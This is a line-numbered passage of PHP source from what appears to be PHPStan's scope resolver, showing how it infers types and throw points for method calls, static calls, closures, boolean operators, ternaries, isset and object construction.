($keyTypes as $k => $keyType) { 1913: $arrayTypeBuilder->setOffsetValueType( 1914: $keyType instanceof ConstantStringType ? $keyType : null, 1915: $valueTypes[$k], 1916: $constantArray->isOptionalKey($k), 1917: ); 1918: } 1919: } 1920: 1921: $constantArray = $arrayTypeBuilder->getArray(); 1922: 1923: if ($constantArray instanceof ConstantArrayType && $nonConstantArrayWasUnpacked) { 1924: $constantArray = $constantArray->isIterableAtLeastOnce()->yes() 1925: ? TypeCombinator::intersect($constantArray->generalizeKeys(), new NonEmptyArrayType()) 1926: : $constantArray->generalizeKeys(); 1927: } 1928: 1929: $newArrayTypes[] = $constantArray; 1930: } 1931: 1932: $arrayType = TypeCombinator::union(...$newArrayTypes); 1933: } else { 1934: $setOffsetValueTypes( 1935: $scope, 1936: $callArgs, 1937: static function (?Type $offsetType, Type $valueType, bool $optional) use (&$arrayType): void { 1938: $isIterableAtLeastOnce = $arrayType->isIterableAtLeastOnce()->yes() || !$optional; 1939: $arrayType = $arrayType->setOffsetValueType($offsetType, $valueType); 1940: if ($isIterableAtLeastOnce) { 1941: return; 1942: } 1943: 1944: $arrayType = new ArrayType($arrayType->getIterableKeyType(), $arrayType->getIterableValueType()); 1945: }, 1946: ); 1947: } 1948: 1949: $scope = $scope->invalidateExpression($arrayArg)->assignExpression($arrayArg, $arrayType, $arrayType); 1950: } 1951: 1952: if ( 1953: isset($functionReflection) 1954: && in_array($functionReflection->getName(), ['fopen', 'file_get_contents'], true) 1955: ) { 1956: $scope = $scope->assignVariable('http_response_header', new ArrayType(new IntegerType(), new StringType())); 1957: } 1958: 1959: if (isset($functionReflection) && $functionReflection->getName() === 'shuffle') { 1960: $arrayArg = $expr->getArgs()[0]->value; 1961: $arrayArgType = $scope->getType($arrayArg); 1962: 1963: if ($arrayArgType instanceof ConstantArrayType) { 1964: $arrayArgType = $arrayArgType->getValuesArray()->generalizeToArray(); 1965: } 1966: 1967: $scope = $scope->assignExpression($arrayArg, $arrayArgType, $arrayArgType); 1968: } 1969: 1970: if ( 1971: isset($functionReflection) 1972: && $functionReflection->getName() === 'array_splice' 1973: && count($expr->getArgs()) >= 1 1974: ) { 1975: $arrayArg = $expr->getArgs()[0]->value; 1976: $arrayArgType = $scope->getType($arrayArg); 1977: $valueType = $arrayArgType->getIterableValueType(); 1978: if (count($expr->getArgs()) >= 4) { 1979: $valueType = TypeCombinator::union($valueType, $scope->getType($expr->getArgs()[3]->value)->getIterableValueType()); 1980: } 1981: $scope = $scope->invalidateExpression($arrayArg)->assignExpression( 1982: $arrayArg, 1983: new ArrayType($arrayArgType->getIterableKeyType(), $valueType), 1984: new ArrayType($arrayArgType->getIterableKeyType(), $valueType), 1985: ); 1986: } 1987: 1988: if (isset($functionReflection) && $functionReflection->getName() === 'extract') { 1989: $scope = $scope->afterExtractCall(); 1990: } 1991: 1992: if (isset($functionReflection) && ($functionReflection->getName() === 'clearstatcache' || $functionReflection->getName() === 'unlink')) { 1993: $scope = $scope->afterClearstatcacheCall(); 1994: } 1995: 1996: if (isset($functionReflection) && str_starts_with($functionReflection->getName(), 'openssl')) { 1997: $scope = $scope->afterOpenSslCall($functionReflection->getName()); 1998: } 1999: 2000: if (isset($functionReflection) && $functionReflection->hasSideEffects()->yes()) { 2001: foreach ($expr->getArgs() as $arg) { 2002: $scope = $scope->invalidateExpression($arg->value, true); 2003: } 2004: } 2005: 2006: } elseif ($expr instanceof MethodCall) { 2007: $originalScope = $scope; 2008: if ( 2009: ($expr->var instanceof Expr\Closure || $expr->var instanceof Expr\ArrowFunction) 2010: && $expr->name instanceof Node\Identifier 2011: && strtolower($expr->name->name) === 'call' 2012: && isset($expr->getArgs()[0]) 2013: ) { 2014: $closureCallScope = $scope->enterClosureCall($scope->getType($expr->getArgs()[0]->value)); 2015: } 2016: 2017: $result = $this->processExprNode($expr->var, $closureCallScope ?? $scope, $nodeCallback, $context->enterDeep()); 2018: $hasYield = $result->hasYield(); 2019: $throwPoints = $result->getThrowPoints(); 2020: $scope = $result->getScope(); 2021: if (isset($closureCallScope)) { 2022: $scope = $scope->restoreOriginalScopeAfterClosureBind($originalScope); 2023: } 2024: $parametersAcceptor = null; 2025: $methodReflection = null; 2026: if ($expr->name instanceof Expr) { 2027: $methodNameResult = $this->processExprNode($expr->name, $scope, $nodeCallback, $context->enterDeep()); 2028: $throwPoints = array_merge($throwPoints, $methodNameResult->getThrowPoints()); 2029: $scope = $methodNameResult->getScope(); 2030: } else { 2031: $calledOnType = $scope->getType($expr->var); 2032: $methodName = $expr->name->name; 2033: $methodReflection = $scope->getMethodReflection($calledOnType, $methodName); 2034: if ($methodReflection !== null) { 2035: $parametersAcceptor = ParametersAcceptorSelector::selectFromArgs( 2036: $scope, 2037: $expr->getArgs(), 2038: $methodReflection->getVariants(), 2039: ); 2040: 2041: $methodThrowPoint = $this->getMethodThrowPoint($methodReflection, $parametersAcceptor, $expr, $scope); 2042: if ($methodThrowPoint !== null) { 2043: $throwPoints[] = $methodThrowPoint; 2044: } 2045: } 2046: } 2047: $result = $this->processArgs($methodReflection, $parametersAcceptor, $expr->getArgs(), $scope, $nodeCallback, $context); 2048: $scope = $result->getScope(); 2049: if ($methodReflection !== null) { 2050: $hasSideEffects = $methodReflection->hasSideEffects(); 2051: if ($hasSideEffects->yes() || $methodReflection->getName() === '__construct') { 2052: $scope = $scope->invalidateExpression($expr->var, true); 2053: foreach ($expr->getArgs() as $arg) { 2054: $scope = $scope->invalidateExpression($arg->value, true); 2055: } 2056: } 2057: } else { 2058: $throwPoints[] = ThrowPoint::createImplicit($scope, $expr); 2059: } 2060: $hasYield = $hasYield || $result->hasYield(); 2061: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2062: } elseif ($expr instanceof Expr\NullsafeMethodCall) { 2063: $nonNullabilityResult = $this->ensureShallowNonNullability($scope, $scope, $expr->var); 2064: $exprResult = $this->processExprNode(new MethodCall($expr->var, $expr->name, $expr->args, $expr->getAttributes()), $nonNullabilityResult->getScope(), $nodeCallback, $context); 2065: $scope = $this->revertNonNullability($exprResult->getScope(), $nonNullabilityResult->getSpecifiedExpressions()); 2066: 2067: return new ExpressionResult( 2068: $scope, 2069: $exprResult->hasYield(), 2070: $exprResult->getThrowPoints(), 2071: static fn (): MutatingScope => $scope->filterByTruthyValue($expr), 2072: static fn (): MutatingScope => $scope->filterByFalseyValue($expr), 2073: ); 2074: } elseif ($expr instanceof StaticCall) { 2075: $hasYield = false; 2076: $throwPoints = []; 2077: if ($expr->class instanceof Expr) { 2078: $objectClasses = TypeUtils::getDirectClassNames($scope->getType($expr->class)); 2079: if (count($objectClasses) !== 1) { 2080: $objectClasses = TypeUtils::getDirectClassNames($scope->getType(new New_($expr->class))); 2081: } 2082: if (count($objectClasses) === 1) { 2083: $objectExprResult = $this->processExprNode(new StaticCall(new Name($objectClasses[0]), $expr->name, []), $scope, static function (): void { 2084: }, $context->enterDeep()); 2085: $additionalThrowPoints = $objectExprResult->getThrowPoints(); 2086: } else { 2087: $additionalThrowPoints = [ThrowPoint::createImplicit($scope, $expr)]; 2088: } 2089: $classResult = $this->processExprNode($expr->class, $scope, $nodeCallback, $context->enterDeep()); 2090: $hasYield = $classResult->hasYield(); 2091: $throwPoints = array_merge($throwPoints, $classResult->getThrowPoints()); 2092: foreach ($additionalThrowPoints as $throwPoint) { 2093: $throwPoints[] = $throwPoint; 2094: } 2095: $scope = $classResult->getScope(); 2096: } 2097: 2098: $parametersAcceptor = null; 2099: $methodReflection = null; 2100: if ($expr->name instanceof Expr) { 2101: $result = $this->processExprNode($expr->name, $scope, $nodeCallback, $context->enterDeep()); 2102: $hasYield = $hasYield || $result->hasYield(); 2103: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2104: $scope = $result->getScope(); 2105: } elseif ($expr->class instanceof Name) { 2106: $className = $scope->resolveName($expr->class); 2107: if ($this->reflectionProvider->hasClass($className)) { 2108: $classReflection = $this->reflectionProvider->getClass($className); 2109: if (is_string($expr->name)) { 2110: $methodName = $expr->name; 2111: } else { 2112: $methodName = $expr->name->name; 2113: } 2114: if ($classReflection->hasMethod($methodName)) { 2115: $methodReflection = $classReflection->getMethod($methodName, $scope); 2116: $parametersAcceptor = ParametersAcceptorSelector::selectFromArgs( 2117: $scope, 2118: $expr->getArgs(), 2119: $methodReflection->getVariants(), 2120: ); 2121: 2122: $methodThrowPoint = $this->getStaticMethodThrowPoint($methodReflection, $parametersAcceptor, $expr, $scope); 2123: if ($methodThrowPoint !== null) { 2124: $throwPoints[] = $methodThrowPoint; 2125: } 2126: if ( 2127: $classReflection->getName() === 'Closure' 2128: && strtolower($methodName) === 'bind' 2129: ) { 2130: $thisType = null; 2131: if (isset($expr->getArgs()[1])) { 2132: $argType = $scope->getType($expr->getArgs()[1]->value); 2133: if ($argType instanceof NullType) { 2134: $thisType = null; 2135: } else { 2136: $thisType = $argType; 2137: } 2138: } 2139: $scopeClass = 'static'; 2140: if (isset($expr->getArgs()[2])) { 2141: $argValue = $expr->getArgs()[2]->value; 2142: $argValueType = $scope->getType($argValue); 2143: 2144: $directClassNames = TypeUtils::getDirectClassNames($argValueType); 2145: if (count($directClassNames) === 1) { 2146: $scopeClass = $directClassNames[0]; 2147: $thisType = new ObjectType($scopeClass); 2148: } elseif ($argValueType instanceof ConstantStringType) { 2149: $scopeClass = $argValueType->getValue(); 2150: $thisType = new ObjectType($scopeClass); 2151: } elseif ( 2152: $argValueType instanceof GenericClassStringType 2153: && $argValueType->getGenericType() instanceof TypeWithClassName 2154: ) { 2155: $scopeClass = $argValueType->getGenericType()->getClassName(); 2156: $thisType = $argValueType->getGenericType(); 2157: } 2158: } 2159: $closureBindScope = $scope->enterClosureBind($thisType, $scopeClass); 2160: } 2161: } else { 2162: $throwPoints[] = ThrowPoint::createImplicit($scope, $expr); 2163: } 2164: } else { 2165: $throwPoints[] = ThrowPoint::createImplicit($scope, $expr); 2166: } 2167: } 2168: $result = $this->processArgs($methodReflection, $parametersAcceptor, $expr->getArgs(), $scope, $nodeCallback, $context, $closureBindScope ?? null); 2169: $scope = $result->getScope(); 2170: $scopeFunction = $scope->getFunction(); 2171: if ( 2172: $methodReflection !== null 2173: && !$methodReflection->isStatic() 2174: && ( 2175: $methodReflection->hasSideEffects()->yes() 2176: || $methodReflection->getName() === '__construct' 2177: ) 2178: && $scopeFunction instanceof MethodReflection 2179: && !$scopeFunction->isStatic() 2180: && $scope->isInClass() 2181: && ( 2182: $scope->getClassReflection()->getName() === $methodReflection->getDeclaringClass()->getName() 2183: || $scope->getClassReflection()->isSubclassOf($methodReflection->getDeclaringClass()->getName()) 2184: ) 2185: ) { 2186: $scope = $scope->invalidateExpression(new Variable('this'), true); 2187: } 2188: 2189: if ($methodReflection !== null) { 2190: if ($methodReflection->hasSideEffects()->yes() || $methodReflection->getName() === '__construct') { 2191: foreach ($expr->getArgs() as $arg) { 2192: $scope = $scope->invalidateExpression($arg->value, true); 2193: } 2194: } 2195: } 2196: 2197: $hasYield = $hasYield || $result->hasYield(); 2198: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2199: } elseif ($expr instanceof PropertyFetch) { 2200: $result = $this->processExprNode($expr->var, $scope, $nodeCallback, $context->enterDeep()); 2201: $hasYield = $result->hasYield(); 2202: $throwPoints = $result->getThrowPoints(); 2203: $scope = $result->getScope(); 2204: if ($expr->name instanceof Expr) { 2205: $result = $this->processExprNode($expr->name, $scope, $nodeCallback, $context->enterDeep()); 2206: $hasYield = $hasYield || $result->hasYield(); 2207: $scope = $result->getScope(); 2208: } 2209: } elseif ($expr instanceof Expr\NullsafePropertyFetch) { 2210: $nonNullabilityResult = $this->ensureShallowNonNullability($scope, $scope, $expr->var); 2211: $exprResult = $this->processExprNode(new PropertyFetch($expr->var, $expr->name, $expr->getAttributes()), $nonNullabilityResult->getScope(), $nodeCallback, $context); 2212: $scope = $this->revertNonNullability($exprResult->getScope(), $nonNullabilityResult->getSpecifiedExpressions()); 2213: 2214: return new ExpressionResult( 2215: $scope, 2216: $exprResult->hasYield(), 2217: $exprResult->getThrowPoints(), 2218: static fn (): MutatingScope => $scope->filterByTruthyValue($expr), 2219: static fn (): MutatingScope => $scope->filterByFalseyValue($expr), 2220: ); 2221: } elseif ($expr instanceof StaticPropertyFetch) { 2222: $hasYield = false; 2223: $throwPoints = []; 2224: if ($expr->class instanceof Expr) { 2225: $result = $this->processExprNode($expr->class, $scope, $nodeCallback, $context->enterDeep()); 2226: $hasYield = $result->hasYield(); 2227: $throwPoints = $result->getThrowPoints(); 2228: $scope = $result->getScope(); 2229: } 2230: if ($expr->name instanceof Expr) { 2231: $result = $this->processExprNode($expr->name, $scope, $nodeCallback, $context->enterDeep()); 2232: $hasYield = $hasYield || $result->hasYield(); 2233: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2234: $scope = $result->getScope(); 2235: } 2236: } elseif ($expr instanceof Expr\Closure) { 2237: return $this->processClosureNode($expr, $scope, $nodeCallback, $context, null); 2238: } elseif ($expr instanceof Expr\ClosureUse) { 2239: $this->processExprNode($expr->var, $scope, $nodeCallback, $context); 2240: $hasYield = false; 2241: $throwPoints = []; 2242: } elseif ($expr instanceof Expr\ArrowFunction) { 2243: return $this->processArrowFunctionNode($expr, $scope, $nodeCallback, $context, null); 2244: } elseif ($expr instanceof ErrorSuppress) { 2245: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, $context); 2246: $hasYield = $result->hasYield(); 2247: $throwPoints = $result->getThrowPoints(); 2248: $scope = $result->getScope(); 2249: } elseif ($expr instanceof Exit_) { 2250: $hasYield = false; 2251: $throwPoints = []; 2252: if ($expr->expr !== null) { 2253: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, $context->enterDeep()); 2254: $hasYield = $result->hasYield(); 2255: $throwPoints = $result->getThrowPoints(); 2256: $scope = $result->getScope(); 2257: } 2258: } elseif ($expr instanceof Node\Scalar\Encapsed) { 2259: $hasYield = false; 2260: $throwPoints = []; 2261: foreach ($expr->parts as $part) { 2262: $result = $this->processExprNode($part, $scope, $nodeCallback, $context->enterDeep()); 2263: $hasYield = $hasYield || $result->hasYield(); 2264: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2265: $scope = $result->getScope(); 2266: } 2267: } elseif ($expr instanceof ArrayDimFetch) { 2268: $hasYield = false; 2269: $throwPoints = []; 2270: if ($expr->dim !== null) { 2271: $result = $this->processExprNode($expr->dim, $scope, $nodeCallback, $context->enterDeep()); 2272: $hasYield = $result->hasYield(); 2273: $throwPoints = $result->getThrowPoints(); 2274: $scope = $result->getScope(); 2275: } 2276: 2277: $result = $this->processExprNode($expr->var, $scope, $nodeCallback, $context->enterDeep()); 2278: $hasYield = $hasYield || $result->hasYield(); 2279: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2280: $scope = $result->getScope(); 2281: } elseif ($expr instanceof Array_) { 2282: $itemNodes = []; 2283: $hasYield = false; 2284: $throwPoints = []; 2285: foreach ($expr->items as $arrayItem) { 2286: $itemNodes[] = new LiteralArrayItem($scope, $arrayItem); 2287: if ($arrayItem === null) { 2288: continue; 2289: } 2290: $result = $this->processExprNode($arrayItem, $scope, $nodeCallback, $context->enterDeep()); 2291: $hasYield = $hasYield || $result->hasYield(); 2292: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2293: $scope = $result->getScope(); 2294: } 2295: $nodeCallback(new LiteralArrayNode($expr, $itemNodes), $scope); 2296: } elseif ($expr instanceof ArrayItem) { 2297: $hasYield = false; 2298: $throwPoints = []; 2299: if ($expr->key !== null) { 2300: $result = $this->processExprNode($expr->key, $scope, $nodeCallback, $context->enterDeep()); 2301: $hasYield = $result->hasYield(); 2302: $throwPoints = $result->getThrowPoints(); 2303: $scope = $result->getScope(); 2304: } 2305: $result = $this->processExprNode($expr->value, $scope, $nodeCallback, $context->enterDeep()); 2306: $hasYield = $hasYield || $result->hasYield(); 2307: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2308: $scope = $result->getScope(); 2309: } elseif ($expr instanceof BooleanAnd || $expr instanceof BinaryOp\LogicalAnd) { 2310: $leftResult = $this->processExprNode($expr->left, $scope, $nodeCallback, $context->enterDeep()); 2311: $rightResult = $this->processExprNode($expr->right, $leftResult->getTruthyScope(), $nodeCallback, $context); 2312: $rightExprType = $rightResult->getScope()->getType($expr->right); 2313: if ($rightExprType instanceof NeverType && $rightExprType->isExplicit()) { 2314: $leftMergedWithRightScope = $leftResult->getFalseyScope(); 2315: } else { 2316: $leftMergedWithRightScope = $leftResult->getScope()->mergeWith($rightResult->getScope()); 2317: } 2318: 2319: $this->callNodeCallbackWithExpression($nodeCallback, new BooleanAndNode($expr, $leftResult->getTruthyScope()), $scope, $context); 2320: 2321: return new ExpressionResult( 2322: $leftMergedWithRightScope, 2323: $leftResult->hasYield() || $rightResult->hasYield(), 2324: array_merge($leftResult->getThrowPoints(), $rightResult->getThrowPoints()), 2325: static fn (): MutatingScope => $rightResult->getScope()->filterByTruthyValue($expr), 2326: static fn (): MutatingScope => $leftMergedWithRightScope->filterByFalseyValue($expr), 2327: ); 2328: } elseif ($expr instanceof BooleanOr || $expr instanceof BinaryOp\LogicalOr) { 2329: $leftResult = $this->processExprNode($expr->left, $scope, $nodeCallback, $context->enterDeep()); 2330: $rightResult = $this->processExprNode($expr->right, $leftResult->getFalseyScope(), $nodeCallback, $context); 2331: $rightExprType = $rightResult->getScope()->getType($expr->right); 2332: if ($rightExprType instanceof NeverType && $rightExprType->isExplicit()) { 2333: $leftMergedWithRightScope = $leftResult->getTruthyScope(); 2334: } else { 2335: $leftMergedWithRightScope = $leftResult->getScope()->mergeWith($rightResult->getScope()); 2336: } 2337: 2338: $this->callNodeCallbackWithExpression($nodeCallback, new BooleanOrNode($expr, $leftResult->getFalseyScope()), $scope, $context); 2339: 2340: return new ExpressionResult( 2341: $leftMergedWithRightScope, 2342: $leftResult->hasYield() || $rightResult->hasYield(), 2343: array_merge($leftResult->getThrowPoints(), $rightResult->getThrowPoints()), 2344: static fn (): MutatingScope => $leftMergedWithRightScope->filterByTruthyValue($expr), 2345: static fn (): MutatingScope => $rightResult->getScope()->filterByFalseyValue($expr), 2346: ); 2347: } elseif ($expr instanceof Coalesce) { 2348: $nonNullabilityResult = $this->ensureNonNullability($scope, $expr->left); 2349: $condScope = $this->lookForSetAllowedUndefinedExpressions($nonNullabilityResult->getScope(), $expr->left); 2350: $condResult = $this->processExprNode($expr->left, $condScope, $nodeCallback, $context->enterDeep()); 2351: $scope = $this->revertNonNullability($condResult->getScope(), $nonNullabilityResult->getSpecifiedExpressions()); 2352: $scope = $this->lookForUnsetAllowedUndefinedExpressions($scope, $expr->left); 2353: 2354: $rightScope = $scope->filterByFalseyValue(new Expr\Isset_([$expr->left])); 2355: $rightResult = $this->processExprNode($expr->right, $rightScope, $nodeCallback, $context->enterDeep()); 2356: $rightExprType = $scope->getType($expr->right); 2357: if ($rightExprType instanceof NeverType && $rightExprType->isExplicit()) { 2358: $scope = $scope->filterByTruthyValue(new Expr\Isset_([$expr->left])); 2359: } else { 2360: $scope = $scope->filterByTruthyValue(new Expr\Isset_([$expr->left]))->mergeWith($rightResult->getScope()); 2361: } 2362: 2363: $hasYield = $condResult->hasYield() || $rightResult->hasYield(); 2364: $throwPoints = array_merge($condResult->getThrowPoints(), $rightResult->getThrowPoints()); 2365: } elseif ($expr instanceof BinaryOp) { 2366: $result = $this->processExprNode($expr->left, $scope, $nodeCallback, $context->enterDeep()); 2367: $scope = $result->getScope(); 2368: $hasYield = $result->hasYield(); 2369: $throwPoints = $result->getThrowPoints(); 2370: $result = $this->processExprNode($expr->right, $scope, $nodeCallback, $context->enterDeep()); 2371: if ( 2372: ($expr instanceof BinaryOp\Div || $expr instanceof BinaryOp\Mod) && 2373: !$scope->getType($expr->right)->toNumber()->isSuperTypeOf(new ConstantIntegerType(0))->no() 2374: ) { 2375: $throwPoints[] = ThrowPoint::createExplicit($scope, new ObjectType(DivisionByZeroError::class), $expr, false); 2376: } 2377: $scope = $result->getScope(); 2378: $hasYield = $hasYield || $result->hasYield(); 2379: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2380: } elseif ($expr instanceof Expr\Include_) { 2381: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, $context->enterDeep()); 2382: $throwPoints = $result->getThrowPoints(); 2383: $throwPoints[] = ThrowPoint::createImplicit($scope, $expr); 2384: $hasYield = $result->hasYield(); 2385: $scope = $result->getScope(); 2386: } elseif ( 2387: $expr instanceof Expr\BitwiseNot 2388: || $expr instanceof Cast 2389: || $expr instanceof Expr\Clone_ 2390: || $expr instanceof Expr\Print_ 2391: || $expr instanceof Expr\UnaryMinus 2392: || $expr instanceof Expr\UnaryPlus 2393: ) { 2394: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, $context->enterDeep()); 2395: $throwPoints = $result->getThrowPoints(); 2396: $hasYield = $result->hasYield(); 2397: 2398: $scope = $result->getScope(); 2399: } elseif ($expr instanceof Expr\Eval_) { 2400: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, $context->enterDeep()); 2401: $throwPoints = $result->getThrowPoints(); 2402: $throwPoints[] = ThrowPoint::createImplicit($scope, $expr); 2403: $hasYield = $result->hasYield(); 2404: 2405: $scope = $result->getScope(); 2406: } elseif ($expr instanceof Expr\YieldFrom) { 2407: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, $context->enterDeep()); 2408: $throwPoints = $result->getThrowPoints(); 2409: $throwPoints[] = ThrowPoint::createImplicit($scope, $expr); 2410: $hasYield = true; 2411: 2412: $scope = $result->getScope(); 2413: } elseif ($expr instanceof BooleanNot) { 2414: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, $context->enterDeep()); 2415: $scope = $result->getScope(); 2416: $hasYield = $result->hasYield(); 2417: $throwPoints = $result->getThrowPoints(); 2418: } elseif ($expr instanceof Expr\ClassConstFetch) { 2419: $hasYield = false; 2420: $throwPoints = []; 2421: if ($expr->class instanceof Expr) { 2422: $result = $this->processExprNode($expr->class, $scope, $nodeCallback, $context->enterDeep()); 2423: $scope = $result->getScope(); 2424: $hasYield = $result->hasYield(); 2425: $throwPoints = $result->getThrowPoints(); 2426: } 2427: } elseif ($expr instanceof Expr\Empty_) { 2428: $nonNullabilityResult = $this->ensureNonNullability($scope, $expr->expr); 2429: $scope = $this->lookForSetAllowedUndefinedExpressions($nonNullabilityResult->getScope(), $expr->expr); 2430: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, $context->enterDeep()); 2431: $scope = $result->getScope(); 2432: $hasYield = $result->hasYield(); 2433: $throwPoints = $result->getThrowPoints(); 2434: $scope = $this->revertNonNullability($scope, $nonNullabilityResult->getSpecifiedExpressions()); 2435: $scope = $this->lookForUnsetAllowedUndefinedExpressions($scope, $expr->expr); 2436: } elseif ($expr instanceof Expr\Isset_) { 2437: $hasYield = false; 2438: $throwPoints = []; 2439: $nonNullabilityResults = []; 2440: foreach ($expr->vars as $var) { 2441: $nonNullabilityResult = $this->ensureNonNullability($scope, $var); 2442: $scope = $this->lookForSetAllowedUndefinedExpressions($nonNullabilityResult->getScope(), $var); 2443: $result = $this->processExprNode($var, $scope, $nodeCallback, $context->enterDeep()); 2444: $scope = $result->getScope(); 2445: $hasYield = $hasYield || $result->hasYield(); 2446: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2447: $nonNullabilityResults[] = $nonNullabilityResult; 2448: } 2449: foreach (array_reverse($expr->vars) as $var) { 2450: $scope = $this->lookForUnsetAllowedUndefinedExpressions($scope, $var); 2451: } 2452: foreach (array_reverse($nonNullabilityResults) as $nonNullabilityResult) { 2453: $scope = $this->revertNonNullability($scope, $nonNullabilityResult->getSpecifiedExpressions()); 2454: } 2455: } elseif ($expr instanceof Instanceof_) { 2456: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, $context->enterDeep()); 2457: $scope = $result->getScope(); 2458: $hasYield = $result->hasYield(); 2459: $throwPoints = $result->getThrowPoints(); 2460: if ($expr->class instanceof Expr) { 2461: $result = $this->processExprNode($expr->class, $scope, $nodeCallback, $context->enterDeep()); 2462: $scope = $result->getScope(); 2463: $hasYield = $hasYield || $result->hasYield(); 2464: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2465: } 2466: } elseif ($expr instanceof List_) { 2467: // only in assign and foreach, processed elsewhere 2468: return new ExpressionResult($scope, false, []); 2469: } elseif ($expr instanceof New_) { 2470: $parametersAcceptor = null; 2471: $constructorReflection = null; 2472: $hasYield = false; 2473: $throwPoints = []; 2474: if ($expr->class instanceof Expr) { 2475: $objectClasses = TypeUtils::getDirectClassNames($scope->getType($expr)); 2476: if (count($objectClasses) === 1) { 2477: $objectExprResult = $this->processExprNode(new New_(new Name($objectClasses[0])), $scope, static function (): void { 2478: }, $context->enterDeep()); 2479: $additionalThrowPoints = $objectExprResult->getThrowPoints(); 2480: } else { 2481: $additionalThrowPoints = [ThrowPoint::createImplicit($scope, $expr)]; 2482: } 2483: 2484: $result = $this->processExprNode($expr->class, $scope, $nodeCallback, $context->enterDeep()); 2485: $scope = $result->getScope(); 2486: $hasYield = $result->hasYield(); 2487: $throwPoints = $result->getThrowPoints(); 2488: foreach ($additionalThrowPoints as $throwPoint) { 2489: $throwPoints[] = $throwPoint; 2490: } 2491: } elseif ($expr->class instanceof Class_) { 2492: $this->reflectionProvider->getAnonymousClassReflection($expr->class, $scope); // populates $expr->class->name 2493: $this->processStmtNode($expr->class, $scope, $nodeCallback); 2494: } else { 2495: $className = $scope->resolveName($expr->class); 2496: if ($this->reflectionProvider->hasClass($className)) { 2497: $classReflection = $this->reflectionProvider->getClass($className); 2498: if ($classReflection->hasConstructor()) { 2499: $constructorReflection = $classReflection->getConstructor(); 2500: $parametersAcceptor = ParametersAcceptorSelector::selectFromArgs( 2501: $scope, 2502: $expr->getArgs(), 2503: $constructorReflection->getVariants(), 2504: ); 2505: $hasSideEffects = $constructorReflection->hasSideEffects(); 2506: if ($hasSideEffects->yes()) { 2507: foreach ($expr->getArgs() as $arg) { 2508: $scope = $scope->invalidateExpression($arg->value, true); 2509: } 2510: } 2511: $constructorThrowPoint = $this->getConstructorThrowPoint($constructorReflection, $parametersAcceptor, $classReflection, $expr, $expr->class, $expr->getArgs(), $scope); 2512: if ($constructorThrowPoint !== null) { 2513: $throwPoints[] = $constructorThrowPoint; 2514: } 2515: } 2516: } else { 2517: $throwPoints[] = ThrowPoint::createImplicit($scope, $expr); 2518: } 2519: } 2520: $result = $this->processArgs($constructorReflection, $parametersAcceptor, $expr->getArgs(), $scope, $nodeCallback, $context); 2521: $scope = $result->getScope(); 2522: $hasYield = $hasYield || $result->hasYield(); 2523: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 2524: } elseif ( 2525: $expr instanceof Expr\PreInc 2526: || $expr instanceof Expr\PostInc 2527: || $expr instanceof Expr\PreDec 2528: || $expr instanceof Expr\PostDec 2529: ) { 2530: $result = $this->processExprNode($expr->var, $scope, $nodeCallback, $context->enterDeep()); 2531: $scope = $result->getScope(); 2532: $hasYield = $result->hasYield(); 2533: $throwPoints = []; 2534: 2535: $newExpr = $expr; 2536: if ($expr instanceof Expr\PostInc) { 2537: $newExpr = new Expr\PreInc($expr->var); 2538: } elseif ($expr instanceof Expr\PostDec) { 2539: $newExpr = new Expr\PreDec($expr->var); 2540: } 2541: 2542: $scope = $this->processAssignVar( 2543: $scope, 2544: $expr->var, 2545: $newExpr, 2546: static function (Node $node, Scope $scope) use ($nodeCallback): void { 2547: if (!$node instanceof PropertyAssignNode) { 2548: return; 2549: } 2550: 2551: $nodeCallback($node, $scope); 2552: }, 2553: $context, 2554: static fn (MutatingScope $scope): ExpressionResult => new ExpressionResult($scope, false, []), 2555: false, 2556: )->getScope(); 2557: } elseif ($expr instanceof Ternary) { 2558: $ternaryCondResult = $this->processExprNode($expr->cond, $scope, $nodeCallback, $context->enterDeep()); 2559: $throwPoints = $ternaryCondResult->getThrowPoints(); 2560: $ifTrueScope = $ternaryCondResult->getTruthyScope(); 2561: $ifFalseScope = $ternaryCondResult->getFalseyScope(); 2562: $ifTrueType = null; 2563: if ($expr->if !== null) { 2564: $ifResult = $this->processExprNode($expr->if, $ifTrueScope, $nodeCallback, $context); 2565: $throwPoints = array_merge($throwPoints, $ifResult->getThrowPoints()); 2566: $ifTrueScope = $ifResult->getScope(); 2567: $ifTrueType = $ifTrueScope->getType($expr->if); 2568: } 2569: 2570: $elseResult = $this->processExprNode($expr->else, $ifFalseScope, $nodeCallback, $context); 2571: $throwPoints = array_merge($throwPoints, $elseResult->getThrowPoints()); 2572: $ifFalseScope = $elseResult->getScope(); 2573: $ifFalseType = $ifFalseScope->getType($expr->else); 2574: 2575: if ($ifTrueType instanceof NeverType && $ifTrueType->isExplicit()) { 2576: $finalScope = $ifFalseScope; 2577: } elseif ($ifFalseType instanceof NeverType && $ifFalseType->isExplicit()) { 2578: $finalScope = $ifTrueScope; 2579: } else { 2580: $finalScope = $ifTrueScope->mergeWith($ifFalseScope); 2581: } 2582: 2583: return new ExpressionResult( 2584: $finalScope, 2585: $ternaryCondResult->hasYield(), 2586: $throwPoints, 2587: static fn (): MutatingScope => $finalScope->filterByTruthyValue($expr), 2588: static fn (): MutatingScope => $finalScope->filterByFalseyValue($expr), 2589: ); 2590: 2591: } elseif ($expr instanceof Expr\Yield_) { 2592: $throwPoints = [ 2593: ThrowPoint::createImplicit($scope, $expr), 2594: ]; 2595: if ($expr->key !== null) { 2596: $keyResult = $this->processExprNode($expr->key, $scope, $nodeCallback, $context->enterDeep()); 2597: $scope = $keyResult->getScope(); 2598: $throwPoints = 